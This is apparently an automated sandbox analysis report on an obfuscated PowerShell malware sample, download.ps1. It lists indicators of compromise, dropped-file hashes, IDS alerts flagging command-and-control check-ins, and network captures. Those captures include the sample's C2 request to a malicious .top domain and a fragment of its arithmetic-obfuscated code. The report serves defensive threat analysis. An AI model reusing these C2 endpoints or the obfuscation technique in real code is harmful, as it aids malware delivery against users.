                                                                                                          Number of injected processes analysed:0
                                                                                                          Technologies:
                                                                                                          • HCA enabled
                                                                                                          • EGA enabled
                                                                                                          • AMSI enabled
                                                                                                          Analysis Mode:default
                                                                                                          Analysis stop reason:Timeout
                                                                                                          Sample name:download.ps1
                                                                                                          Detection:MAL
                                                                                                          Classification:mal72.evad.winPS1@2/7@2/2
                                                                                                          EGA Information:Failed
                                                                                                          HCA Information:Failed
                                                                                                          Cookbook Comments:
                                                                                                          • Found application associated with file extension: .ps1
                                                                                                          • Stop behavior analysis, all processes terminated

                                                                                                          Warnings

                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe
                                                                                                          • Excluded IPs from analysis (whitelisted): 52.111.227.13
                                                                                                          • Excluded domains from analysis (whitelisted): assets.msn.com, ctldl.windowsupdate.com, nexusrules.officeapps.live.com, api.msn.com
                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 8624 because it is empty
                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                          Simulations

                                                                                                          Behavior and APIs

                                                                                                          TimeTypeDescription
                                                                                                          03:45:36API Interceptor29x Sleep call for process: powershell.exe modified

                                                                                                          Joe Sandbox View / Context

                                                                                                          IPs

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          45.61.136.138download.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • kmaealcfcalhcac.top/n917uo0zpthtr.php?id=user-PC&key=103009180819&s=527
                                                                                                          http://diebinjmajbkhhg.top/1.php?s=527Get hashmaliciousUnknownBrowse
                                                                                                          • diebinjmajbkhhg.top/1.php?s=527
                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • jejmbadfmeenlnk.top/exikvouhlzhtr.php?id=computer&key=73195386263&s=527
                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • jejmbadfmeenlnk.top/7zp8hc951fhtr.php?id=user-PC&key=47155048466&s=527
                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • jejmbadfmeenlnk.top/jkhy8nim3ohtr.php?id=computer&key=23808639779&s=527
                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • jejmbadfmeenlnk.top/rye5ap6jovhtr.php?id=user-PC&key=76750660876&s=527
                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • canjjclmlnicbga.top/qp49hfdl12htr.php?id=computer&key=36785799113&s=527
                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • canjjclmlnicbga.top/ujbqd70lwehtr.php?id=user-PC&key=103617095359&s=527

                                                                                                          Domains

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          kmaealcfcalhcac.topdownload.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • 45.61.136.138

                                                                                                          ASNs

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          AS40676USdownload.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • 45.61.136.138
                                                                                                          http://diebinjmajbkhhg.top/1.php?s=527Get hashmaliciousUnknownBrowse
                                                                                                          • 45.61.136.138
                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • 45.61.136.138
                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • 45.61.136.138
                                                                                                          install.msiGet hashmaliciousUnknownBrowse
                                                                                                          • 193.32.177.34
                                                                                                          install.msiGet hashmaliciousUnknownBrowse
                                                                                                          • 193.32.177.34
                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • 45.61.136.138
                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • 45.61.136.138
                                                                                                          5.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 104.149.140.73

                                                                                                          JA3 Fingerprints

                                                                                                          No context

                                                                                                          Dropped Files

                                                                                                          No context

                                                                                                          Created / dropped Files

                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):64
                                                                                                          Entropy (8bit):1.1940658735648508
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Nlllulwnxj:NllUSx
                                                                                                          MD5:56D8320D702FE6600E82F4E99701A1E9
                                                                                                          SHA1:874CC256AD8866BCC4F2880ED90E10D047E8481A
                                                                                                          SHA-256:967E51C12B40746E26C9DDE76DDA42228833A07BB7E678E56718182D0ED5F463
                                                                                                          SHA-512:5D0FA9AB700F148FD5CF24F9EC4754A64A9D0944211B8F2A38D60FC3E391F511898D382274E82BA9A83DCCFCA09C743260073C7D411194EF0458C3DD09F7C050
                                                                                                          Malicious:false
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview:@...e................................................@..........

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0zuclxt1.twn.ps1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:high, very likely benign file
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3y35qwey.ntd.ps1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:high, very likely benign file
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gp3cmyvr.znm.psm1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oo0ca3np.uvc.psm1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6222
                                                                                                          Entropy (8bit):3.7380601183863837
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:iYgBCAGPkvhkvCCto7C7tw0/SHy27C7tw0/SHw:iYgZyKC7twoToC7two3
                                                                                                          MD5:CF60F22785B79FC3A3AC0BFFE5D4CE50
                                                                                                          SHA1:46EC883FF1657FCDBBB2C0B5FBDB8509A5B68BDF
                                                                                                          SHA-256:C3F699490C7EBC504B11723987D3E416F252AD4FA4081590F10915910FF69A0D
                                                                                                          SHA-512:60E259E96E6F3D28788B1A6ED0E6130716E31B8BA3ECCCAD6A2DF48DD999158CA53E05235B3723FF9285D63E001894C3802CE2D5CC89286DD1C06BF570AAB3C7
                                                                                                          Malicious:false
                                                                                                          Preview:...................................FL..................F.".. ......A....4....d..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........A....m$.'.d...Y...d......t...CFSF..1.....&W.<..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......&W.<+Z.E.............................A.p.p.D.a.t.a...B.V.1.....+Z.E..Roaming.@......&W.<+Z.E..............................R.o.a.m.i.n.g.....\.1.....+YS6..MICROS~1..D......&W.<+Z.E...........................RN.M.i.c.r.o.s.o.f.t.....V.1.....+Z....Windows.@......&W.<+Z.E..........................Coa.W.i.n.d.o.w.s.......1.....&W.<..STARTM~1..n......&W.<+Zt.....................D.......b.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....&W.<..Programs..j......&W.<+Z......................@......+}.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......&W.<+Z............................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......&W.<+Z.E....8...........

                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SYL8M6XH2JZ9E8I4G9W6.temp

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6222
                                                                                                          Entropy (8bit):3.7380601183863837
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:iYgBCAGPkvhkvCCto7C7tw0/SHy27C7tw0/SHw:iYgZyKC7twoToC7two3
                                                                                                          MD5:CF60F22785B79FC3A3AC0BFFE5D4CE50
                                                                                                          SHA1:46EC883FF1657FCDBBB2C0B5FBDB8509A5B68BDF
                                                                                                          SHA-256:C3F699490C7EBC504B11723987D3E416F252AD4FA4081590F10915910FF69A0D
                                                                                                          SHA-512:60E259E96E6F3D28788B1A6ED0E6130716E31B8BA3ECCCAD6A2DF48DD999158CA53E05235B3723FF9285D63E001894C3802CE2D5CC89286DD1C06BF570AAB3C7
                                                                                                          Malicious:false
                                                                                                          Preview:...................................FL..................F.".. ......A....4....d..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........A....m$.'.d...Y...d......t...CFSF..1.....&W.<..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......&W.<+Z.E.............................A.p.p.D.a.t.a...B.V.1.....+Z.E..Roaming.@......&W.<+Z.E..............................R.o.a.m.i.n.g.....\.1.....+YS6..MICROS~1..D......&W.<+Z.E...........................RN.M.i.c.r.o.s.o.f.t.....V.1.....+Z....Windows.@......&W.<+Z.E..........................Coa.W.i.n.d.o.w.s.......1.....&W.<..STARTM~1..n......&W.<+Zt.....................D.......b.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....&W.<..Programs..j......&W.<+Z......................@......+}.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......&W.<+Z............................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......&W.<+Z.E....8...........

                                                                                                          Static File Info

                                                                                                          General

                                                                                                          File type:ASCII text, with very long lines (10898), with CRLF line terminators
                                                                                                          Entropy (8bit):5.943165680685654
                                                                                                          TrID:
                                                                                                            File name:download.ps1
                                                                                                            File size:20'643 bytes
                                                                                                            MD5:81b74a62ffc263437801f0e3dbc1b1eb
                                                                                                            SHA1:f1649560edbc7742352cec091f4dc26922d9bdcb
                                                                                                            SHA256:9229403e77c223dc8acb86755f6576ff22ff15362da8b2577a85ed2083205e71
                                                                                                            SHA512:45e2de5567ec6174d4cb91f2d7995f0fa2b5bfbe43897253a2bd2e6303f9d8752455f0c07c2789adda0d2f743ebdf345e8586dee605f76bc1eebdd704bbfcbb5
                                                                                                            SSDEEP:384:FkqH4yQGBHxjB5FRLHC7OmB7eR7pL4+h2+ntWEPp5gOCbh77t18im65W6gipzvR:Fk4b5jB5FRLi75aR7yczobh3t18ik6lz
                                                                                                            TLSH:F4926DE16784E4A2C7CEC72E7A07BC197F11342FE4D9B6C4F298E68266927006D4DCD2
                                                                                                            File Content Preview:$gmpuvkadj=$executioncontext;$esontionaredtionenaroren = ([CHaR[]]@((5081-5028),(5083-5031),(-2900+(9386-6429)),(59450/(6800-5611)),(66024/1179),(1258-1204),(9944-(33144576/(-5084+8436))),(406670/(35705626/4829)),(506770/(88472828/(56680606/5903))),(2862-

                                                                                                            File Icon

                                                                                                            Icon Hash:3270d6baae77db44

                                                                                                            Network Behavior

                                                                                                            Suricata IDS Alerts

                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2025-01-11T09:45:39.301965+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.305279923.45.46.170443TCP
                                                                                                            2025-01-11T09:45:40.368167+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.11.305280045.61.136.13880TCP
                                                                                                            2025-01-11T09:45:40.368167+01002057741ET MALWARE TA582 CnC Checkin1192.168.11.305280045.61.136.13880TCP
                                                                                                            2025-01-11T09:45:40.726140+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.11.3052801142.250.191.19680TCP
                                                                                                            2025-01-11T09:46:42.801954+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.305280323.45.46.170443TCP

                                                                                                            Network Port Distribution

                                                                                                            TCP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Jan 11, 2025 09:45:39.814882040 CET5280080192.168.11.3045.61.136.138
                                                                                                            Jan 11, 2025 09:45:39.990837097 CET805280045.61.136.138192.168.11.30
                                                                                                            Jan 11, 2025 09:45:39.991172075 CET5280080192.168.11.3045.61.136.138
                                                                                                            Jan 11, 2025 09:45:39.996438026 CET5280080192.168.11.3045.61.136.138
                                                                                                            Jan 11, 2025 09:45:40.170646906 CET805280045.61.136.138192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.316673040 CET805280045.61.136.138192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.368166924 CET5280080192.168.11.3045.61.136.138
                                                                                                            Jan 11, 2025 09:45:40.441776037 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.560199022 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.560401917 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.560513973 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.679049015 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.725843906 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.725964069 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.726090908 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.726134062 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.726140022 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.726290941 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.726308107 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.726372957 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.726511955 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.726624966 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.726638079 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.726720095 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.726886034 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.726991892 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.727173090 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.844624996 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.844726086 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.844964027 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.848927021 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.849025965 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.849200010 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.857578039 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.857676983 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.857898951 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.866234064 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.866326094 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.866527081 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.874912024 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.875046015 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.875250101 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.883621931 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.883733988 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.883924007 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.892096996 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.892324924 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.892503977 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.900736094 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.900829077 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.901083946 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.909446001 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.909547091 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.909776926 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.918045998 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.918284893 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.918438911 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.963459015 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.963577986 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.963833094 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.967744112 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.967847109 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.968060970 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.976425886 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.976527929 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.976759911 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.983928919 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.984153032 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.984338045 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.991415977 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.991518974 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.991692066 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.998910904 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.998999119 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.999185085 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:41.006324053 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:41.006465912 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:41.006711006 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:41.013740063 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:41.055540085 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:41.219929934 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:41.220762014 CET5280080192.168.11.3045.61.136.138

                                                                                                            UDP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Jan 11, 2025 09:45:39.606645107 CET5079653192.168.11.301.1.1.1
                                                                                                            Jan 11, 2025 09:45:39.803500891 CET53507961.1.1.1192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.321235895 CET5406553192.168.11.301.1.1.1
                                                                                                            Jan 11, 2025 09:45:40.440736055 CET53540651.1.1.1192.168.11.30

                                                                                                            DNS Queries

                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Jan 11, 2025 09:45:39.606645107 CET192.168.11.301.1.1.10x268aStandard query (0)kmaealcfcalhcac.topA (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 09:45:40.321235895 CET192.168.11.301.1.1.10x742aStandard query (0)www.google.comA (IP address)IN (0x0001)false

                                                                                                            DNS Answers

                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Jan 11, 2025 09:45:39.803500891 CET1.1.1.1192.168.11.300x268aNo error (0)kmaealcfcalhcac.top45.61.136.138A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 09:45:40.440736055 CET1.1.1.1192.168.11.300x742aNo error (0)www.google.com142.250.191.196A (IP address)IN (0x0001)false

                                                                                                            HTTP Request Dependency Graph

                                                                                                            • kmaealcfcalhcac.top
                                                                                                            • www.google.com

                                                                                                            HTTP Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.11.305280045.61.136.138808624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 09:45:39.996438026 CET215OUTGET /36aol1ybpfhtr.php?id=computer&key=67225157272&s=527 HTTP/1.1
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                            Host: kmaealcfcalhcac.top
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 11, 2025 09:45:40.316673040 CET166INHTTP/1.1 302 Found
                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                            Date: Sat, 11 Jan 2025 08:45:40 GMT
                                                                                                            Content-Length: 0
                                                                                                            Connection: keep-alive
                                                                                                            Location: http://www.google.com


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.11.3052801142.250.191.196808624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 09:45:40.560513973 CET159OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                            Host: www.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 11, 2025 09:45:40.725843906 CET1289INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 08:45:40 GMT
                                                                                                            Expires: -1
                                                                                                            Cache-Control: private, max-age=0
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-ils713Qx1Uk8tr0XAmAxgg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                            Server: gws
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            Set-Cookie: AEC=AZ6Zc-XxE8ij8Y-AxKz1IC1-H9WXG2CEg9Yzo7Z0dPbAOuAxIzoxn10-Sg; expires=Thu, 10-Jul-2025 08:45:40 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                            Set-Cookie: NID=520=dRJuEk70uQCMDlmub_wRmltadR9EiqMdmsHi-H6uQVsRh1o5FQ5GvzJvOjo0ZiJAGMwrtEnUXYxJ2BhhugEqwQPVdoXN-4ni0UXu-jMVCcezUIzjhOSfD3dQpIzbigDw54TrCbzbyZznZYoEDKfbkuvpTvrKJOo914D49EG0tVKPAnm8BWa1KsqXDvL7NtJZEU8EWgDm; expires=Sun, 13-Jul-2025 08:45:40 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                            Accept-Ranges: none
                                                                                                            Vary: Accept-Encoding
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Data Raw: 35 35 39 63 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68
                                                                                                            Data Ascii: 559c<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google has many special features to h
